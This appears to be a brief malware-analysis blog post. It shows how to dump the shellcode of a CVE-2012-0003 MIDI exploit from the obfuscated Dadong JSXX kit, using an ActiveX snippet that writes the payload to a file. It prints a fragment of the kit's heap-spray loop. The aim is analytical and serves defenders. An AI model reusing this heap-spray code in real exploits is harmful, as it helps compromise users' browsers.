Shellcode of Exploit CVE-2012-0003 (MIDI file ….) from Dadong JSXX 0.41 VIP obfuscated script…

Insert following code  at “INSERT” location in original malicious script . remove MIDI exploitation code before execution 🙂

 

var fpo = new ActiveXObject(“Scripting.FileSystemObject”);
var sc = fpo.OpenTextFile(“c:\\Shellcode.bin”,true);
sc.WriteLine(escape(kpemoez4));
sc.Close();

 

————————————————————————————
———————————————————————————–

try{alert(a,b,c);}
catch(e)
{
var HrMm7=”d”;
while(FJWVzIe1.length < aqfvjY5/2) FJWVzIe1 +=FJWVzIe1;
var DmxL8 = FJWVzIe1.substring(0, aqfvjY5/2);
HrMm7=”d”;
delete FJWVzIe1;

“INSERT”

for(i=0;i<270;i++)
{
NyWLa1[i] = DmxL8+DmxL8+kpemoez4;
}

}

——————————————————————————————-
——————————————————————————————

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: